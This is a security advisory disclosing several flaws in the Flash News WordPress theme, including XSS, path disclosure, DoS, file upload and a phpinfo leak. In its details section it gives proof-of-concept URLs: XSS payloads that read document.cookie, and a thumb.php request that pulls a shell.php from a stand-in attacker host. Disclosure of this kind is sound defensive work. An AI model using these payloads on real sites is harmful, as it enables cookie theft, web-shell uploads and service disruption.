I want to warn you about multiple vulnerabilities in Flash News theme for WordPress. This is commercial theme for WP from WooThemes.
These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload and Information Leakage vulnerabilities.
In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading vulnerability. After previous advisory, I've wrote another one about multiple themes from WooThemes (http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site Scripting vulnerabilities (only part of their themes were affected).
If two years ago I've wrote about holes in TimThumb and multiples themes from WooThemes (where I mentioned Flash News), then this time I wrote directly about this particular theme. And also I've added other holes in it.
This is example for Flash News theme. In other themes from WooThemes the situation is similar. In above-mentioned advisory I've listed 89 vulnerable themes for WP from WooThemes.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Flash News theme for WordPress (in last versions there were fixed only vulnerabilities in thumb.php). I've informed developers about these vulnerabilities already in beginning of 2011 (as about holes in TimThumb, as about holes in their native scripts in their themes - for WordPress and other engines).
After two years since I've informed WooThemes developers, there are hundreds thousands of sites with only Flash News theme (not mentioning all other themes), according to Google, and all of them are still vulnerable to many of these vulnerabilities. Mostly were fixed holes in thumb.php, but not in other vulnerable scripts of the theme, and there are many sites which have fixed only part of the holes in TimThumb in the theme. E.g. they fixed Code Execution (AFU), AoF and DoS holes, but XSS and FPD holes were left.
----------
Details:
----------
XSS (WASC-08):
http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1
Abuse of Functionality (WASC-42):
http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
DoS (WASC-10):
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)
About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
Arbitrary File Upload (WASC-31) (in not fixed versions of TimThumb):
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php
Full path disclosure (WASC-13):
http://site/wp-content/themes/flashnews/
Besides index.php there are also potentially FPD in other php-files of this theme.
Information Leakage (WASC-13):
http://site/wp-content/themes/flashnews/includes/test.php
Script with phpinfo.
XSS (WASC-08):
http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where was possible to conduct XSS via phpinfo).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information